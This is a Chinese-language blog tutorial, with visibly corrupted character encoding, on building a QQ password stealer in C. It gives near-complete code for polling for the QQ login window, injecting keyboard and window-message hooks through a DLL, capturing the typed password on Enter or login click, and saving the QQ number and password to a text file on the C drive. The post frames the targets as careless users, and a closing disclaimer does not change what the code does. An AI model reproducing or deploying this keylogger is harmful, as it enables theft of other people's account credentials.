一般的盜密碼的軟件的軟件都是通過(guò)監(jiān)視鍵盤(pán)來(lái)獲得密碼,這樣操作比較方便,但是這樣也存在一定問(wèn)題,密碼有的時(shí)候不是很準(zhǔn)確,因?yàn)橛械娜溯斎朊艽a并不是從前到后輸入,當(dāng)然這樣的人也是少數(shù),盜密碼嘛,當(dāng)然去得到那些比較粗心的人的密碼! 通過(guò)安裝鉤子來(lái)監(jiān)視QQ登陸界面就是獲得密碼的方法,在安裝前得先找到登陸窗口的句柄,當(dāng)鉤子安裝后,記錄鍵盤(pán),當(dāng)用戶(hù)“回車(chē)”或是點(diǎn)了“登陸”就可以開(kāi)始處理密碼了! 我準(zhǔn)備分為四部分來(lái)說(shuō)明這個(gè)整個(gè)過(guò)程:
(1)尋找QQ登陸界面。
(2)安裝鉤子
(3)鉤子函數(shù)的解釋.
(4)處理密碼。
以下部分全是使用C語(yǔ)言,文章中我假設(shè)讀者您是會(huì)C/SDK編程的。如果遇到相關(guān)的概念性問(wèn)題,您可以查看MSDN或是上BBS 詢(xún)問(wèn)!
尋找QQ登陸界面
軟件運(yùn)行后,利用安裝定時(shí)器,每秒在系統(tǒng)找QQ登陸界面,這樣基本上只要用戶(hù)打開(kāi)了QQ登陸界面就會(huì)被抓住其句柄,看下面代碼:
#define ID_MYTIMER 555
SetTimer(hDlg, ID_MYTIMER, 1000, NULL);
安裝好TIMER后,下面是處理主程序的WM_TIMER消息,凡是出現(xiàn)沒(méi)有定義的變量,您可以理解為是全局變量.
//處理WM_TIMER代碼
if (!IsWindow(g_hQQLogin)) //判斷g_hQQLogin是否是有效的窗口句柄
{
HWND hLogin=NULL;
g_hQQLogin = NULL;
SetQQHook(NULL); //參數(shù)為NULL是卸載HOOK,參數(shù)為句柄是安裝句柄
do
{
//利用FindWindowEx查找QQ登陸窗口,具體參數(shù)意思請(qǐng)查MSDN
g_hQQLogin=FindWindowEx(NULL,g_hQQLogin,"#32770",NULL); //對(duì)話框的類(lèi)都是#32770
//找到類(lèi)名是#32770后,再在其窗體內(nèi)找一個(gè)具有“ 登錄QQ”的BUTTON按紐
hLogin = FindWindowEx(g_hQQLogin, NULL, "Button", " 登錄QQ"); //這一句很關(guān)鍵,如果你的QQ登陸窗口上沒(méi)有" 登錄QQ"字樣,那么獲取密碼將失敗!
}
while(g_hQQLogin != NULL && hLogin == NULL); //直到找到指定的窗口,即:QQ登陸窗口
if (g_hQQLogin != NULL)
{
SetQQHook(g_hQQLogin);//安裝HOOK,此函數(shù)在DLL文件中 第二部分中介紹
}
}
上面就是查找QQ登陸窗口句柄的過(guò)程,從代碼可以看出我用的方法:找一個(gè)其子窗體中有一個(gè)標(biāo)題為“ 登錄QQ”的BUTTON的對(duì)話框(這句話說(shuō)得有點(diǎn)饒口,這句話如果也看不懂,下面您不用看了:() 我最開(kāi)始是想利用 FindWindow(NULL,"QQ用戶(hù)登陸窗口")來(lái)查找,但是我用Spy++看了QQ登陸窗口的標(biāo)題并不是“QQ用戶(hù)登陸窗口”,而是“亂碼”,其中包含了回車(chē)鍵等特殊字符,于是我用了FindWindowEx().
安裝鉤子
找到了QQ登陸窗口后,就成功了一半。
下面是DLL文件中的安裝HOOK的函數(shù)SetQQHook(), 為什么要用DLL(動(dòng)態(tài)連接庫(kù))?要去“鉤”其他進(jìn)程的消息,得讓HOOK函數(shù)在DLL中,這樣好映射到其地址空間中!
BOOL WINAPI SetQQHook(HWND hQQLogin)
{
//獲得登陸框的句柄
BOOL bRet = FALSE;
if (hQQLogin != NULL)
{
DWORD dwThreadID = GetWindowThreadProcessId(hQQLogin, NULL); //這是什么意思?看MSDN
g_hNum = GetDlgItem(hQQLogin, 138);//不同版本QQ,此處不一樣! 得到QQ號(hào)的子窗口句柄
g_hPsw = GetDlgItem(hQQLogin, 180); //不同版本QQ,此處不一樣!得到QQ密碼的子窗口句柄
if (g_hNum == NULL)
{
MessageBox(NULL,"哭了,號(hào)碼句柄都沒(méi)有得到!","郁悶",0);
return FALSE;
}
if(g_hPsw==NULL)
{
MessageBox(NULL,"哭了,密碼句柄都沒(méi)有得到!","郁悶",0);
return FALSE;
}
分別鍵盤(pán)HOOK,和界面部分消息處理的HOOK
g_hProc = SetWindowsHookEx(WH_CALLWNDPROC, CallWndProc, g_hInstDLL, dwThreadID);
g_hKey = SetWindowsHookEx(WH_KEYBOARD, KeyboardProc, g_hInstDLL, dwThreadID);
bRet = (g_hProc != NULL) && (g_hKey != NULL);
}
else
{
// 卸載鉤子
bRet = UnhookWindowsHookEx(g_hProc) && UnhookWindowsHookEx(g_hKey);
g_hProc = NULL;
g_hKey = NULL;
g_hNum = NULL;
}
return bRet;
}
上面是安裝HOOK部分的代碼,就這么簡(jiǎn)單,上面提到了CallWndProc,KeyboardProc是兩個(gè)回調(diào)函數(shù),是我第三部分要解釋的鉤子函數(shù)
鉤子函數(shù)的解釋
CallWndProc,KeyboardProc是兩個(gè)回調(diào)函數(shù)的原型和具體代碼如下:
// 鉤子過(guò)程,監(jiān)視“登陸”的命令消息
LRESULT CALLBACK CallWndProc(int nCode, WPARAM wParam, LPARAM lParam)
{
CWPSTRUCT *p = (CWPSTRUCT *)lParam;
// 捕獲“登陸”按鈕
if (p->message == WM_COMMAND && p->wParam ==16032)
//下面?zhèn)€函數(shù)是我在第四部分介紹-“處理密碼”部分會(huì)仔細(xì)說(shuō)明
//當(dāng)用戶(hù)點(diǎn)了登陸按鈕,說(shuō)明QQ號(hào)碼和QQ密碼已經(jīng)填寫(xiě)完畢,當(dāng)然可以去獲得密碼了
GetPasswrod();
return CallNextHookEx(g_hProc, nCode, wParam, lParam);
}
// 鍵盤(pán)鉤子過(guò)程,監(jiān)視“登陸”的熱鍵消息
LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam)
{
// 捕獲熱鍵消息,記錄鍵盤(pán)的按鍵盤(pán)過(guò)程,pmsg是PMSG類(lèi)型的,i是全局Static類(lèi)型的
pmsg[i].wParam =wParam;
i++;
if (wParam == VK_RETURN) //用戶(hù)使用鍵盤(pán)“回車(chē)”來(lái)登陸,用戶(hù)用了回車(chē)后,就可以可以去獲得密碼了
GetPasswrod();
return CallNextHookEx(g_hKey, nCode, wParam, lParam);
}
在明白了這兩個(gè)鉤子函數(shù)后就可以看后期是如何具體處理密碼的了,這就是下面的第四部分內(nèi)容
處理密碼
如果您讀到了此處,我想得暫停一會(huì),先讓我來(lái)幫你回憶一下前面提到的幾個(gè)關(guān)鍵的變量
第一個(gè):QQ號(hào)的子窗口句柄 g_hNum
第二個(gè):QQ密碼的子窗口句柄 g_hPsw //此部分暫時(shí)不使用,下面
第三個(gè):存鍵盤(pán)按鍵的 pmsg
上面三變量分別出現(xiàn)在第二部分和第三部分,都是全局共享(shared)變量
QQ密碼的子窗口句柄 g_hPsw 此部分暫時(shí)不使用,你可以看到下面代碼中有句用到g_hPsw的語(yǔ)句是我注釋掉了的,原因是無(wú)法通過(guò)那樣去得到QQ密碼,得處理按鍵消息
void GetPasswrod()
{
//聲明變量和初始化
HANDLE f;
TCHAR num[13];
TCHAR psw[21];
TCHAR total[50];
int j;
memset(num,0,sizeof(num));
memset(total,0,sizeof(total));
memset(psw,0,sizeof(psw));
DWORD dw;
//得到QQ號(hào)的內(nèi)容,以為有的人的QQ號(hào)是在登陸框有記錄,其QQ號(hào)并是用鍵盤(pán)輸入的
GetWindowText(g_hNum,(LPSTR)num,sizeof(num));
//GetWindowText(g_hPsw,(LPSTR)psw,sizeof(psw)); //此句不使用,無(wú)法這樣獲得密碼
//提取出鍵盤(pán)記錄,此內(nèi)容也許全是密碼,也許是QQ號(hào)+QQ密碼
for(j=0;j<20;j++)
{
psw[j]=(TCHAR)pmsg[j*2].wParam ;
}
psw[j+1]=’\0’;
//把QQ號(hào)碼和QQ密碼寫(xiě)入C盤(pán)password.txt中
f=CreateFile("c:\\password.txt",GENERIC_WRITE,FILE_SHARE_WRITE,NULL,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
strcat(total,"號(hào)碼");
strcat(total,num);
strcat(total,"密碼:");
strcat(total,psw);
WriteFile(f,&total,sizeof(total),&dw,NULL);
CloseHandle(f);
}
最后在C盤(pán)password.txt也許會(huì)出現(xiàn)這樣兩種情況:
1)當(dāng)QQ號(hào)是沒(méi)有用輸入,而已用的粘貼或者是電腦以前有記錄則是:號(hào)碼:21728812密碼:TEST
2) 當(dāng)QQ號(hào)是用的鍵盤(pán)輸入,電腦沒(méi)有QQ號(hào)記錄時(shí)則是:號(hào)碼:21728812密碼:21728812TEST
可以看出,第2種情況把QQ當(dāng)成了密碼了,所以密碼還得減去QQ號(hào),
特別說(shuō)明:我這樣直接處理wParam參數(shù),得到的字符密碼全是大寫(xiě)的,具體大小寫(xiě)問(wèn)題我沒(méi)有就沒(méi)有仔細(xì)去處理的,功能實(shí)現(xiàn)就行了,畢竟我使用他不用來(lái)盜密碼的!
上面四部分基本上獲得密碼的功能介紹完畢。凡是沒(méi)有介紹的變量皆是全局變量,沒(méi)有提到的函數(shù)如:GetWindowThreadProcessId(),SetWindowsHookEx(),UnhookWindowsHookEx(),CallNextHookEx(),CreateFile(),WriteFile()等皆是Windows API,我提到的“HOOK”,“鉤子”是同一個(gè)意思,也許有的地方我說(shuō)的鉤子函數(shù),而另外一個(gè)地方說(shuō)的是HOOK函數(shù)
特別說(shuō)明:上面有具體的運(yùn)行文件,由于小弟并沒(méi)有考慮到更多細(xì)節(jié),我只是用了“理想”狀況下去獲得密碼,并且或的密碼后并沒(méi)有注重后期密碼處理,也許出現(xiàn)密碼大小寫(xiě)不符合或是無(wú)法得到密碼,請(qǐng)大家千萬(wàn)別笑話,我寫(xiě)這篇菜鳥(niǎo)級(jí)別的Blog的原因意在告訴一些對(duì)這方面感到疑惑的朋友基本的原理,和希望和大俠們交流 !
評(píng)論
查看更多